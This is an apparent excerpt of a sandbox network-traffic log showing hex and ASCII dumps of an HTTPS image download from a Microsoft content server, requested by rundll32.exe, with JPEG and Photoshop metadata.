                                                                                                                                                                                    2023-01-05 07:58:11 UTC7288INData Raw: ac ab 46 f6 eb 9a f7 b6 24 e3 52 ed 26 6c ff 00 66 7c 8f 75 f3 6d ab 3f 0e 58 f1 b0 e5 87 21 e6 8e 37 81 e4 2b 06 e0 5e 43 64 6e e8 bd a3 59 16 2b af 8d c7 06 b9 45 35 dd db dd de be 62 8c 8c c9 fb b9 f6 ef ed 19 cc da 7c 71 26 dd b7 a2 d5 71 8d 6b f7 5a 85 8a b4 f1 a8 8a 18 a0 35 ac 10 47 64 5f 24 7c ce b5 e6 91 68 93 3d fa bd db ee 06 2e 47 91 79 44 d2 47 97 30 97 1f 07 66 c1 80 54 86 55 9b be b2 bd c2 18 a1 52 24 79 c5 d2 f5 3f b0 3d 35 e7 66 87 ab 37 5a 6c 53 72 7c f7 6b dc fc 77 13 c5 76 ec 16 8a fc e8 f2 32 12 e0 d1 82 aa 44 f2 41 23 31 65 5c 96 11 ca e2 4a ac 4c ac c0 da c2 de 38 b3 5a fd c6 8d a3 be c1 e2 db 96 ff 00 2e 46 f3 e4 91 e5 66 78 b6 c1 87 34 ac 63 93 f6 c7 6d 4b 43 8d 13 d6 d4 ee c9 d4 ec a3 8f ce 7a 86 ba 70 3e 6b 5e 86 1e e3 db 78 56
                                                                                                                                                                                    Data Ascii: F$R&lf|um?X!7+^CdnY+E5b|q&qkZ5Gd_$|h=.GyDG0fTUR$y?=5f7ZlSr|kwv2DA#1e\JL8Z.Ffx4cmKCzp>k^xV
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7304INData Raw: ee e9 f1 5a 7f e4 76 e1 c6 a2 59 2b f7 14 6d af 8f 12 e3 e3 c6 1e 6c a8 e4 9d 94 5a d6 00 41 55 03 f4 f3 3f 85 ba e3 ec ed 66 db 6f a3 82 f9 60 a4 f9 a6 dd 87 e3 79 94 db a5 12 63 4a 86 97 8a 85 b8 75 01 5f 8d 6a 0f fb ba f6 3b 5c 96 ca bc c8 e6 cb 55 5d 8e 7e 29 b5 6f 9b e6 64 9b 4e db 81 2e 5b e5 47 5b 0c 6c 05 83 93 96 36 a2 2d 7d b2 1f 5e 00 eb af 26 29 d7 c0 ca 96 3e 82 f0 5f fe 3a 6f 72 38 cb f3 5c 84 84 23 a5 d8 98 ed 7b ba 50 1a 4b 28 21 10 7e a0 81 aa a3 de 35 1e 85 16 ac b2 b3 37 6c 5d bf 6b f0 9d 9b 1e 3d bf 16 3c 5c 18 15 a4 96 cb 3f ca 42 0c 82 e0 55 9e be eb 2e ba eb ab f8 f2 fa ef 1a 6e bf 68 36 75 4f 73 11 de 7e e4 36 2e 6e 7e 4a 4b 9c d8 04 2f 69 f2 54 47 dc a5 6d 10 f1 0d db 90 fb 42 aa 5a ab 69 f6 b5 7e 73 3e 7c 92 96 1b 3f f9 3e 29 ff
                                                                                                                                                                                    Data Ascii: ZvY+mlZAU?fo`ycJu_j;\U]~)odN.[G[l6-}^&)>_:or8\#{PK(!~57l]k=<\?BU.nh6uOs~6.n~JK/iTGmBZi~s>|?>)
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7311INData Raw: 5b c1 5e 87 6e 07 a8 70 d6 f8 f3 2c 96 6a 27 8d ba 3e a6 56 bb a9 13 b5 41 ba ec fe 40 7c db 20 97 1b 86 67 d2 65 44 f5 be 10 f2 76 a1 21 7d ac a8 dd a5 6b 96 e4 b5 ad aa b6 bd 6e cf 13 b7 9e eb ab 56 ab e8 73 da cd 3d 0e 3e 5f e3 59 5e 39 e5 58 be 43 b2 e2 c5 99 03 c5 94 f2 e0 cb 3f 67 f7 92 d7 ee 62 bb 03 1a cc e9 79 b6 5f da 7e dd b7 2b 15 d7 ab 7e cf 1c cc 7b 7e f3 2e 66 3f bc f9 96 27 92 67 b6 66 cf 84 d8 f8 52 3a c6 ed 9b 22 99 63 91 48 bd 7b 48 fc 5e 3e ab 51 ba 9b f4 f0 d7 0e 5c 69 6c 39 6b a9 13 e3 5e 65 ba f8 c4 f2 49 26 4b ce 93 24 b2 44 64 91 5a d1 33 15 59 7b 55 fd b9 6f 37 d3 de bd 56 ab 6b ca bd 2d 66 a0 d5 5a 0a 5f 97 61 67 24 af 34 f9 6c c1 59 16 c7 a0 07 91 0e ea a3 81 a7 5b 4d 4e aa 7e aa db eb d2 22 0c e4 90 c2 f2 9f fb 3f 70 da f7 19
                                                                                                                                                                                    Data Ascii: [^np,j'>VA@| geDv!}knVs=>_Y^9XC?gby_~+~{~.f?'gfR:"cH{H^>Q\il9k^eI&K$DdZ3Y{Uo7Vk-fZ_ag$4lY[MN~"?p
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7327INData Raw: aa 8a 92 78 00 35 0d c1 24 4e df e5 3b 36 e7 21 8b 1b 25 0c 8b e8 dd 35 fc ae a5 75 92 cd 57 d4 81 c1 df 76 c0 fd b1 91 13 48 0d 2d 0e 09 a8 f4 a6 a7 d4 af 89 25 3f 7c f3 4c dd bb 31 6c a7 6a b7 05 e1 c5 7f 1d 70 e4 ee 38 9a aa a3 8e 07 dd 28 9a 73 1e 72 2a 29 f6 95 af 1a f2 a9 ff 00 cb 51 8f ba 9d ca ba 96 8d 83 cb 30 7c 8e 47 87 1a e5 95 05 d6 b7 c3 97 f6 fc 46 ba f1 e6 57 d8 ab 50 4f 58 df 03 ae 89 2a 16 37 c0 e9 20 2d 3a 72 44 89 4d 47 24 40 9f f8 e7 a7 24 48 55 7e 23 fb 46 9c 90 12 f4 1f 32 ff 00 68 d4 73 5e 20 4e e4 7f ad 7f e2 1a 8e 68 1e 4c f0 83 c6 44 ff 00 88 7f b7 4f 51 78 92 07 22 01 ce 44 ff 00 89 7f db a7 a9 5f 12 04 fa 9c 7f fd d8 ff 00 e3 5f f6 ea 3d 4a f8 93 01 f5 58 ff 00 fb b1 ff 00 c6 bf ed d3 d4 af 88 81 0e 56 3f fe ec 7f f1 af fb 74
                                                                                                                                                                                    Data Ascii: x5$N;6!%5uWvH-%?|L1ljp8(sr*)Q0|GFWPOX*7 -:rDMG$@$HU~#F2hs^ NhLDOQx"D__=JXV?t
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7383INData Raw: ce 88 6d 4d 34 4b 96 41 e8 01 8a ba fb c9 66 26 c2 47 f2 f0 1f dd ae bb a5 04 52 dd 06 b0 ec 12 6e b2 d4 2b 1a b3 5d 2a 00 55 83 9f 6b 10 6e 55 5e 43 a3 95 d7 06 f7 6b 7e de 92 67 90 d0 f6 8d b2 2d a7 15 71 e3 1d 40 75 37 32 c7 e2 c7 d7 5e bd 54 18 8f ab ab 12 1a 10 2e 80 4a d3 40 15 d0 91 74 03 09 b3 9e 2a 98 7b 6c c7 dc 0d dc 00 e1 cd 6b 56 3c c0 e9 d7 99 9b 2b ab 84 6f 5a c9 07 9f bf 62 e2 84 79 1d 5a 73 5b 1a 35 6b c1 ad 64 3c 47 45 a9 45 e7 71 e0 b5 a7 1d 79 7e a3 b6 da 9a ec 58 30 6f 70 25 20 f6 d9 16 db da e7 f8 f1 34 e5 c7 d5 ab af 73 0c b5 a9 cd 68 1d f2 d7 59 41 2b a0 0a e8 0f 2d 22 a7 b8 81 a9 22 4e 4f 9b 04 7e e6 1a 9e 2c ab b2 1b be ef 0a f0 45 66 3f d9 ab 70 2a ee 55 3c fb 78 2f b3 76 d5 4a dd 2a 56 87 89 00 31 a0 fc 7e 1f 8d 06 bc 8f a9 28
                                                                                                                                                                                    Data Ascii: mM4KAf&GRn+]*UknU^Ck~g-q@u72^T.J@t*{lkV<+oZbyZs[5kd<GEEqy~X0op% 4shYA+-""NO~,Ef?p*U<x/vJ*V1~(
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7391INData Raw: b6 f5 33 78 c6 52 61 e5 3a 05 4c a2 0a 91 c6 d2 7f 87 3d 5d 77 cb c0 af 03 91 d8 73 27 c8 19 2b 94 41 5a 1b 44 47 9f f6 ea df fb 2a d5 44 12 b1 c8 e6 3d 8a 50 e4 8c c9 01 3f 18 c8 fe 1e eb 74 ff 00 da 55 74 36 58 90 ea 5d a6 36 36 cb 91 25 08 a1 b5 78 72 f5 e6 75 5f fd 8d 5f 42 ef 1d 4e 5f f6 de 09 51 0b e4 4e 57 d0 54 0f f5 6a ff 00 fb 1a be 84 ac 74 3d e3 78 b6 d5 0b de 8d 29 2b f1 93 87 e7 fc 75 57 f5 0a db 73 45 8e 88 ea 7c 6b 66 9a b2 34 57 13 ea cc 48 d5 7f 77 5f 13 4e 35 3d a7 8e ed 05 8b 18 d4 8a 53 89 34 1f df a3 ee 6b e2 5e 2a 4c 47 b3 6d 71 28 03 e9 ee 3c 97 81 f4 af fa bf b7 56 5d c2 7d 4c dd ab e0 55 bc f3 00 e6 26 1e db 82 81 d6 4c 84 13 bc 6a 2d 48 ee 00 dc 7f 2a eb a3 16 6a ea db 29 7b ae 83 0d af 30 6d 58 ce 24 86 41 38 6b ea 8a 4f 70 b3
                                                                                                                                                                                    Data Ascii: 3xRa:L=]ws'+AZDG*D=P?tUt6X]66%xru__BN_QNWTjt=x)+uWsE|kf4WHw_N5=S4k^*LGmq(<V]}LU&Lj-H*j){0mX$A8kOp
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7407INData Raw: 4d 05 0d 07 a5 4f 3a 53 44 9c 89 47 3f a8 54 35 5a 9f 5e 3f 1f ed e1 ab 6e 56 45 87 2b b4 2b 45 b8 ad 41 61 52 07 f7 d7 86 a9 7c 7c 8d 2b 78 17 b8 1e 96 8e aa 90 6a 48 a8 f4 fe 3a 8e 30 26 45 b9 23 0c d2 25 68 3f 12 38 7f a6 9a bb 52 55 38 3c c7 3a ca 2d 40 42 d7 92 d4 d4 9f 4e 3f 0d 38 f5 12 74 b5 1d bb 52 06 54 f7 37 ca d4 f4 3c 69 c7 8e aa db 4a 51 64 97 53 a2 ac 36 c8 aa 84 95 fc 69 cb 9f f7 6b 09 b6 e6 b0 8f 26 14 75 65 50 43 50 92 0b 7a 0f 43 4f 8f c3 e1 ab bc 8d 6e 55 51 3d 82 2c 14 89 82 c8 dc 58 12 68 e4 52 9c 40 e6 40 24 f0 d4 5b 29 3e 98 81 60 42 05 96 80 3a 81 02 b5 fe 26 bc f5 65 7b 46 85 78 a3 aa 76 aa ca bc 02 d4 fb 69 cb d5 87 e1 eb a3 bb 43 8a 39 c4 b0 5a 5b b8 a4 b1 0a 2b f9 f2 e5 e9 5e 7a b3 bb 7a 05 54 74 06 02 42 c7 46 35 e7 5e 5f 86
                                                                                                                                                                                    Data Ascii: MO:SDG?T5Z^?nVE++EAaR||+xjH:0&E#%h?8RU8<:-@BN?8tRT7<iJQdS6ik&uePCPzCOnUQ=,XhR@@$[)>`B:&e{FxviC9Z[+^zzTtBF5^_
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7423INData Raw: 4a 80 54 31 e3 5a d4 50 1e 60 fe 3c b5 d1 2d 3f 61 93 d8 e8 31 cb 02 16 40 41 05 db 89 ad 17 e5 1f 9d 3d 75 5b 64 4b a1 65 4f 69 c7 b2 ee 5b e8 e4 12 80 c0 5c 08 0a 01 a9 0d c7 95 39 6b 4f 51 2f 89 41 9f 06 f6 1a bf f5 00 9d b5 68 6c 5a 9a 31 00 8a 10 3e 06 9f db ad 3c 93 3a 95 8b 44 1d fb d3 46 b7 18 96 e4 52 48 50 78 0f 88 f8 7f 1d 12 5e 25 5c f8 0d c9 12 01 74 6c 1a 9c 2a 3d 00 e3 f9 d3 9f e1 ae 95 a7 53 18 93 8a e1 9a 5c 63 20 8a 50 97 3e bf db cf 56 f5 17 88 f4 df 81 dc a8 09 58 fa 59 7d c0 b5 4f 0f fc 72 d6 6a ed b2 ce a7 58 4a 48 d6 77 54 11 4a 5d 5f e2 05 2b c7 f8 ea 2d 67 5e 85 ab 0f a9 ea 64 99 94 19 5d 6a bc 28 6e 34 f8 f1 23 9f c4 6a 95 ca 93 d8 b3 ab 6b 73 c2 4b 1c ab c6 ce 06 ea 8a 0e 5f ab 91 f4 d6 bc a0 cd 6a 74 5c 89 16 20 b0 aa 10 3d be
                                                                                                                                                                                    Data Ascii: JT1ZP`<-?a1@A=u[dKeOi[\9kOQ/AhlZ1><:DFRHPx^%\tl*=S\c P>VXY}OrjXJHwTJ]_+-g^d]j(n4#jksK_jt\ =
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7431INData Raw: ab 75 5a a7 10 4f a5 10 9b dc e7 fd 25 a6 65 8a 08 99 d6 46 21 4a 1a 92 bf 3b 95 e1 c6 9f e1 f8 6b 05 dc f0 53 67 16 4b 66 4b c3 2f 4d 8e b9 bb 5f 62 4e c2 89 23 8c 54 2b 4c 2d 66 61 e8 10 0b b9 7c 06 b1 c1 dd b6 b9 38 b3 fe 8d 7f 33 4c 98 3a 2d 3d e3 44 db 33 ad 3d 94 b6 de 08 cc 0d 25 35 3c 54 1e 2c 7d 14 52 ba ea b7 7b 44 f5 fb ff 00 a7 de 61 5c 16 63 34 61 93 98 61 c8 5b 41 73 78 7e 9a 05 f9 81 f4 af 1f fe e7 5d 56 ba 89 46 5c 75 86 37 fa bf a5 86 e6 72 19 ae 53 43 d3 cf a4 57 d7 87 1d 42 ac 91 b0 d1 9a 5c a9 9e 33 2a b7 6f 89 00 90 2a 0f 3e 75 3c 87 2d 6e a8 aa 43 d4 f4 73 b2 63 8d cc 91 ab 29 8f a0 b1 35 05 ab c0 56 81 8f 0f 87 ae b3 74 9d 99 65 a6 e4 ee 1e 72 a6 27 d4 2a 28 7e 00 54 10 48 23 8d 48 e1 cf e0 2b f9 eb cf c9 46 ef fd 26 f5 b2 4a 4e 1b
                                                                                                                                                                                    Data Ascii: uZO%eF!J;kSgKfK/M_bN#T+L-fa|83L:-=D3=%5<T,}R{Da\c4aa[Asx~]VF\u7rSCWB\3*o*>u<-nCsc)5Vter'*(~TH#H+F&JN
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7484INData Raw: 4d 6e 63 42 29 41 c0 7f 65 3d 74 b4 75 15 1c 48 8c 72 7b 72 54 15 17 92 07 a5 4d 29 a8 4d 24 5b 8b 3a cf 82 61 7f dc 2e af c4 30 61 6b 71 f7 74 f3 14 e1 4a eb 2c 79 55 e7 f9 17 be 3e 27 14 10 63 a7 79 38 47 c4 16 e2 6b cc 0a d7 57 f6 19 c0 63 4e 0b 55 ae a1 23 8f f1 e3 c3 9d 35 66 42 01 75 8c c3 fc b5 20 5e 4f 01 c2 bc 17 9f 2f c3 54 77 49 c7 52 dc 5c 49 d5 65 10 9a 1a d5 57 89 04 1a 83 f0 ae a7 71 b1 c2 4c 99 87 6e ee 84 b6 a4 fa 50 d6 97 7e 3a 98 48 ab 6d 9d 66 2f 88 c6 39 bf cd 55 06 c1 f8 8e 75 af 3e 2a da ce 96 4f 55 b1 7b 56 37 3c 62 c8 5c d1 8d cb c4 f0 e0 68 3d df f8 3a 9b 39 d8 ad 57 88 bf 56 aa 0c 4e 18 ad 38 32 8f ef 03 85 7f 0e 5a b7 16 d0 94 75 59 9d d6 c1 10 00 ab 00 78 d4 53 f2 e1 f1 ff 00 c0 d4 a5 05 db 11 24 2d 1d 8e 0d f7 7b 83 74 d2 9c
                                                                                                                                                                                    Data Ascii: MncB)Ae=tuHr{rTM)M$[:a.0akqtJ,yU>'cy8GkWcNU#5fBu ^O/TwIR\IeWqLnP~:Hmf/9Uu>*OU{V7<b\h=:9WVN82ZuYxS$-{t
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7500INData Raw: 96 50 b5 b5 6a 28 00 16 81 ce aa 56 9f fd 74 98 52 44 0e 71 54 42 91 fd 4d 49 16 a8 1c 68 a1 7f 70 7e 15 76 3a ca ce 5e 84 a3 d9 86 04 9f 1a 09 e8 52 6a 39 34 e0 c4 8a b5 3f 8f 0e 3f a4 e8 9e fe c2 d0 22 86 9a 28 03 c9 52 b2 3a d6 9c 81 92 de 7f 16 71 d3 fa 53 80 d4 ce a4 1c 03 19 66 05 3f 76 5b cc 8e 58 90 0b 5e b5 af af 4e a6 7a b2 24 28 b3 a0 ec a1 62 ec ac c9 ea ca 59 87 3e 74 7d 52 75 82 a3 bc dc 2c 78 b1 e3 9b ba 6d 55 6b 3d 41 0c ed 52 7e 34 ff 00 4e 95 b3 98 2e cf 49 94 c1 a2 76 37 48 52 d7 0b d5 c0 ad 84 fe 03 85 bf 1a ea 24 89 38 ed e8 ad 21 0c 28 c0 8a 95 e2 39 dd 5e 74 f6 fb 74 ea 4d 77 17 25 0e 6c 0b 9f 0d 23 92 c8 c2 ad 39 17 ea 22 bf a4 53 87 f1 e1 ab db 47 1d 09 b6 a7 28 e4 79 b0 92 65 ff 00 3d 49 61 68 fe 62 6e 3c 7f 4a 7a 53 96 a9 3a c1
                                                                                                                                                                                    Data Ascii: Pj(VtRDqTBMIhp~v:^Rj94??"(R:qSf?v[X^Nz$(bY>t}Ru,xmUk=AR~4N.Iv7HR$8!(9^ttMw%l#9"SG(ye=Iahbn<JzS:
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7524INData Raw: 99 03 ac 6b 8e 5c 6e f1 90 e8 1b b9 f8 97 2c 6c 6f d2 14 50 af f6 36 b3 b5 a2 a4 88 b0 a4 26 18 c9 05 24 65 62 c4 fc 09 05 d7 d7 81 63 cf f2 d5 15 a5 36 41 d6 1c 70 25 8a 47 af 64 70 90 29 f5 4a 35 7d 79 86 35 5d 61 ca 53 24 e9 11 c8 fa c0 b3 27 ed 88 cd a0 72 17 59 4a b7 c5 83 5d a8 70 eb a1 23 cc 40 92 83 1c 85 80 50 16 87 95 1c 8a dd f9 b7 fe 9d 61 77 05 8e 39 12 4f 90 c6 2a 10 ce 85 c5 38 05 e0 45 47 1e 4b 77 fa 3e 1a 55 a5 a9 1b 8c 59 92 c9 cc 8b c0 c2 8a a7 da b5 60 03 27 0f 50 d4 6a da 7f d5 ad bc 3d e4 1d b2 26 39 0b 8f 15 23 73 12 80 54 f0 a5 48 a1 17 52 a0 51 8d 7d 75 45 e5 6c 33 a4 d9 ab 8a 8c 65 40 ee 92 97 66 1e d1 67 50 3c 7d 45 c3 fb c8 d4 d1 4b d0 93 bb c7 22 92 ea 47 78 2f 5d 00 a9 2c 1b 89 fe 63 6e a1 db c4 98 21 32 22 38 52 12 a4 ba 32
                                                                                                                                                                                    Data Ascii: k\n,loP6&$ebc6Ap%Gdp)J5}y5]aS$'rYJ]p#@Paw9O*8EGKw>UY`'Pj=&9#sTHRQ}uEl3e@fgP<}EK"Gx/],cn!2"8R2
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7540INData Raw: 3f 4f 04 62 c6 9c 49 e4 bc 58 ff 00 2f e5 a2 ac 6e 19 12 db be 4c 2b 0c 78 d2 2b cd 24 25 4b 51 68 10 56 e6 a9 e3 d5 ff 00 d9 ea e0 ba d1 61 4d b9 09 f8 1c f7 7c d3 e2 19 73 61 a9 4c 83 1d a9 74 aa c2 e6 65 bd d4 9f d5 ee 40 aa 7f 49 d7 65 b0 4b 21 e8 c7 18 f8 b9 90 61 c9 16 62 5b dc 16 b5 05 59 5a 51 5e 7e da 2f c7 fd 67 5c 97 71 6d 09 4c 93 ce da b1 e0 48 e0 85 db b7 23 09 67 11 d5 a4 91 9a 8a 14 b1 af 00 3e 1f c3 59 d2 cd ef f7 1a 34 88 2d e3 1b 12 5c b6 ce 91 e3 09 1d 4b 03 52 d1 b8 24 44 01 a7 cd d3 d2 bf 9d 35 dc a5 28 45 6d ec 1d e0 60 65 e4 c9 34 f9 51 ac 4b 34 8a a1 cc 83 ab a4 5b 21 5f 73 3d d7 25 58 7c 59 42 eb 9a d7 4a 20 a2 52 71 8b 67 94 36 37 7e 44 76 c5 cd 69 4b 20 1d 51 a2 09 19 47 cd d2 63 5b cb d3 ab d2 84 6b b6 99 17 4e a8 b5 51 0b 83
                                                                                                                                                                                    Data Ascii: ?ObIX/nL+x+$%KQhVaM|saLte@IeK!ab[YZQ^~/g\qmLH#g>Y4-\KR$D5(Em`e4QK4[!_s=%X|YBJ Rqg67~DviK QGc[kNQ
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7556INData Raw: 17 0b 80 ab 7e 5d 20 9f cb 4e 55 ab d4 aa ab b6 a8 eb b1 64 cd 9d 2f d2 c6 f0 46 a0 33 2c b9 20 f6 ed b4 a8 b4 0f 73 31 73 70 f8 6a 9d ce 45 8a bc a1 db fa 6a 6f 86 8e ce 36 f7 92 99 b3 c6 27 10 77 a2 9d 91 16 b3 29 2f 52 9c 1b de 2a 40 e7 ae 7e da fc d4 f1 74 fe 96 33 53 8b de 4a eb ef 22 0c e4 ed c7 fb e4 54 31 26 80 30 b3 82 fa 86 5e 47 e5 d7 aa b1 9c ca d0 42 0c 88 18 b8 8a 32 f1 a4 92 88 f8 b5 ce 08 1f e6 5a 47 0f fe ca eb 65 8e cf 77 1f cb dc 4f 24 b6 1f 64 c1 95 1e 2c 73 e7 61 49 8f 8d 20 06 3e 87 31 31 90 0b 9d 64 3c 2c 7e 9f 73 7b ab ae 6c 59 6b c9 d1 5d 5a cb fe af c0 da f4 7b c4 21 de ef e4 ed 99 91 8a 92 4b 22 a7 6a 3e ea a5 42 30 e1 cc 54 03 68 0a 38 f3 1a be 3e d2 b5 52 96 b3 f7 91 7c ee da 0d a3 8e 5d ca ed b4 42 b3 4b 23 00 2e 75 14 a5 68
                                                                                                                                                                                    Data Ascii: ~] NUd/F3, s1spjEjo6'w)/R*@~t3SJ"T1&0^GB2ZGewO$d,saI >11d<,~s{lYk]Z{!K"j>B0Th8>R|]BK#.uh
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7564INData Raw: d3 e0 bc 07 cd ac df 71 56 95 e7 cb 6d 89 58 9c c1 65 da fc 5b 37 07 ea 1b 72 82 33 84 f6 b4 a9 92 eb 13 48 8c f7 46 d0 31 ea 49 85 c1 91 bd be 8f 72 f4 eb 83 27 d4 e8 ac 92 9b 37 fa 54 9d 34 ed ad 0d b3 a6 07 88 45 99 98 06 d1 03 e4 46 14 15 76 3c 4a 11 67 50 3d 28 fc d5 80 b9 78 74 ea bd c7 7c b0 a9 bd a1 15 ae 17 77 15 43 ec 6f 1e c6 f1 d9 b2 bf a8 e2 c5 36 51 b9 ab 20 6a 44 00 a9 a2 2d b7 35 a6 83 fd 1a f3 3f 75 6e f1 27 8e ce 95 ff 00 b8 ec a6 35 85 f9 97 22 33 7d f1 68 cd fb 9f 7b 0a f7 20 98 a3 6e b6 4e 15 b9 47 05 a2 50 58 1b 9f bb 96 bb 3b 7e f1 d5 fa 51 77 fd 6d 79 4e 7c b8 65 73 95 ee 3b cb 83 3c 48 9b 8c f1 48 ad 2d a9 dc 2b 68 2b c8 0a 9f 5a 7b be 3a da bd c5 72 3e 29 a7 06 36 a5 aa a5 8d 36 7c 00 67 43 8f 8e 0a 25 5e 40 57 b8 5c d7 88 a5 29
                                                                                                                                                                                    Data Ascii: qVmXe[7r3HF1Ir'7T4EFv<JgP=(xt|wCo6Q jD-5?un'5"3}h{ nNGPX;~QwmyN|es;<HH-+h+Z{:r>)66|gC%^@W\)


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    35192.168.2.44973180.67.82.211443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2335OUTGET /cms/api/am/imageFileData/RE4RDSw?ver=2d41 HTTP/1.1
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                                                                                                                    Host: img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2828INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Content-Location: https://image.prod.cms.rt.microsoft.com/cms/api/am/imageFileData/RE4RDSw?ver=2d41
                                                                                                                                                                                    Last-Modified: Fri, 16 Dec 2022 07:55:38 GMT
                                                                                                                                                                                    X-Source-Length: 1748536
                                                                                                                                                                                    X-Datacenter: northeu
                                                                                                                                                                                    X-ActivityId: 3b45f3f0-5dd4-44a7-a663-3bba642421c9
                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                    Content-Length: 1748536
                                                                                                                                                                                    Cache-Control: public, max-age=259372
                                                                                                                                                                                    Expires: Sun, 08 Jan 2023 08:01:02 GMT
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:58:10 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2828INData Raw: ff d8 ff e1 13 7d 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0e a6 00 00 00 27 10 00 0e a6 00 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 31 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 31 3a 31 37 20 30 38 3a 34 31 3a 31 34 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
                                                                                                                                                                                    Data Ascii: }ExifMM*bj(1r2i''Adobe Photoshop 21.1 (Windows)2022:01:17 08:41:148"
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2860INData Raw: 74 6f 73 68 6f 70 3a 4c 61 79 65 72 4e 61 6d 65 3d 22 46 72 69 64 61 79 2c 20 4d 61 79 20 31 22 20 70 68 6f 74 6f 73 68 6f 70 3a 4c 61 79 65 72 54 65 78 74 3d 22 46 72 69 64 61 79 2c 20 4d 61 79 20 31 22 2f 3e 20 3c 2f 72 64 66 3a 42 61 67 3e 20 3c 2f 70 68 6f 74 6f 73 68 6f 70 3a 54 65 78 74 4c 61 79 65 72 73 3e 20 3c 78 6d 70 4d 4d 3a 48 69 73 74 6f 72 79 3e 20 3c 72 64 66 3a 53 65 71 3e 20 3c 72 64 66 3a 6c 69 20 73 74 45 76 74 3a 61 63 74 69 6f 6e 3d 22 63 72 65 61 74 65 64 22 20 73 74 45 76 74 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 33 35 31 63 38 30 66 39 2d 38 35 31 65 2d 31 65 34 36 2d 39 62 63 30 2d 66 65 33 38 62 35 66 35 32 38 39 32 22 20 73 74 45 76 74 3a 77 68 65 6e 3d 22 32 30 31 35 2d 30 34 2d 31 37 54 31 32 3a 32 30
                                                                                                                                                                                    Data Ascii: toshop:LayerName="Friday, May 1" photoshop:LayerText="Friday, May 1"/> </rdf:Bag> </photoshop:TextLayers> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:351c80f9-851e-1e46-9bc0-fe38b5f52892" stEvt:when="2015-04-17T12:20
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2884INData Raw: 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 45 64 67 65 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 34 30 31 31 39 30 37 35 5f 31 39 32 30 78 31 30 38 30 37 31 46 45 39 41 46 35 30 41 43 46 42 44 36 33 34 33 43 31 37 42 30 39 32 46 34 35 45 46 42 38 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 36 54 31 38 3a 31 37 3a 35 36 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 36
                                                                                                                                                                                    Data Ascii: aming\Adobe\Adobe Photoshop CC 2015.5\AutoRecover\_Edge_GettyImages-140119075_1920x108071FE9AF50ACFBD6343C17B092F45EFB8.psb saved&#xA;2016-07-26T18:17:56-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1920x1080_Landscape.psd saved&#xA;2016-07-26
